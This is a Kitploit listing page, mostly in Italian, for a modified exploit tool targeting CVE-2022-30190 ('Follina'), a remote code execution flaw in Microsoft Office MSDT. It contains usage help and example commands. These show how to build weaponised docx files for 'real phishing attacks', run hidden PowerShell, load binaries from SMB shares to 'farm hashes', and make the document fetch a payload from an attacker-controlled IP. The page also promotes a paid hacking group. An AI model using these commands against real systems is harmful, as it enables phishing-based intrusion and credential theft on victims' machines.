Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-30190-follina-Office-MSDT-Fixed — Strumento di exploit modificato per CVE-2022-30190 per MS-MSDT Office RCE con supporto di modelli docx personalizzati, modalità di esecuzione binaria/comando e server HTTP incorporato per la consegna remota del payload. | Kitploit
Strumenti/GitHubGitHub/komomon/cve-2022-30190-follina-office-msdt-fixed
Strumenti di PhishingGenerazione di PayloadExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubkomomon/cve-2022-30190-follina-office-msdt-fixed

CVE-2022-30190-follina-Office-MSDT-Fixed

Strumento di exploit modificato per CVE-2022-30190 per MS-MSDT Office RCE con supporto di modelli docx personalizzati, modalità di esecuzione binaria/comando e server HTTP incorporato per la consegna remota del payload.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi RepositorySito web
3905243 anni faRevisionato da Kitploit

'Follina' MS-MSDT n-day Microsoft Office RCE—Versione modificata

Basato sul progetto di https://github.com/chvancooten/follina.py, modificato per consentire di specificare un file modello docx personalizzato, utile per l'uso in attacchi di phishing reali. Dopo aver preparato il documento Word di phishing, specificarlo con il parametro -f.

Usage:

root@kitploit:~
usage: follina.py [-h] -m {binary,command} [-b BINARY] [-f FILE] [-c COMMAND] [-u URL] [-H HOST] [-P PORT]

optional arguments:
  -h, --help            show this help message and exit

Required Arguments:
  -m {binary,command}, --mode {binary,command}
                        Execution mode, can be "binary" to load a (remote) binary, or "command" to run an encoded PS command

Binary Execution Arguments:
  -b BINARY, --binary BINARY
                        The full path of the binary to run. Can be local or remote from an SMB share

Docx file Arguments:
  -f FILE, --file FILE  The docx file

Command Execution Arguments:
  -c COMMAND, --command COMMAND
                        The encoded command to execute in "command" mode

Optional Arguments:
  -u URL, --url URL     The hostname or IP address where the generated document should retrieve your payload, defaults to "localhost"
  -H HOST, --host HOST  The interface for the web server to listen on, defaults to all interfaces (0.0.0.0)
  -P PORT, --port PORT  The port to run the HTTP server on, defaults to 80

Examples:

root@kitploit:~
默认docx muban.docx
# Execute a local binary
python .\follina.py -m binary -b \windows\system32\calc.exe
python .\follina.py -m binary -b \windows\system32\calc.exe -f muban2.docx

# On linux you may have to escape backslashes
python .\follina.py -m binary -b \\windows\\system32\\calc.exe

# Execute a binary from a file share (can be used to farm hashes 👀)
python .\follina.py -m binary -b \\localhost\c$\windows\system32\calc.exe

# Execute an arbitrary powershell command
python .\follina.py -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c echo owned > c:\users\public\owned.txt'"

# Run the web server on the default interface (all interfaces, 0.0.0.0), but tell the malicious document to retrieve it at http://1.2.3.4/exploit.html
python .\follina.py -m binary -b \windows\system32\calc.exe -u 1.2.3.4

# Only run the webserver on localhost, on port 8080 instead of 80
python .\follina.py -m binary -b \windows\system32\calc.exe -H 127.0.0.1 -P 8080

image-20220602201236509

image-20220602201350939

Comunicazione e contatti

Se interessati, potete seguire l'account ufficiale Z2O安全攻防 e rispondere con "加群", aggiungere Z2OBot 小K che vi aggiungerà automaticamente al Z2O安全攻防交流群 per condividere altre risorse utili.

image-20220427110933992

公众号

Z2Oqq二维码4-16814031792311

Il team ha creato un Knowledge Planet (gruppo a pagamento) che pubblica aggiornamenti periodici sulle ultime riproduzioni di vulnerabilità, guide passo-passo, e aggiornamenti di POC e tecniche avanzate di penetration testing interno/esterno. Se interessati, potete unirvi.

image-20220427111016139

图片

图片

image-20230414002829568

Benvenuti a mettere una stella ⭐ O(∩_∩)O

Scarica lo strumento